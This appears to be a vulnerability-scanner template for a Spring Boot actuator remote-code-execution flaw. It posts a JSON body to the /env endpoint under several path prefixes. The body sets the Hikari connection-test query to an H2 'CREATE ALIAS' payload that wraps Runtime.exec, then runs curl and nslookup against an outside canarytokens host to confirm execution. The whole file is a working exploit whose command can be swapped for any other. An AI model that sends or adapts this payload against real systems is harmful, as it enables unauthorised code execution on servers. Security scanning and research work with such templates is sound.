id: spring-env-rce
level: 2
info:
  name: Spring Boot RCE
  risk: Critical


params:
  - dest: '{{co9qlflin32nkmko7qfowl4ik.canarytokens.com}}'
  - root: '{{.BaseURL}}'

replicate:
  prefixes: 'actuator, api, admin, eureka, api/v1'

requests:
  - method: POST
    redirect: false
    url: >-
     {{.root}}/env
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    body: |
        {"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream());  if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('curl  http://{{.dest}}');"}

  - method: POST
    redirect: false
    url: >-
     {{.root}}/env
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    body: |
        {"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream());  if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('nslookup  {{.dest}}');"}

references:
  - tool: https://github.com/LandGrey/SpringBootVulExploit
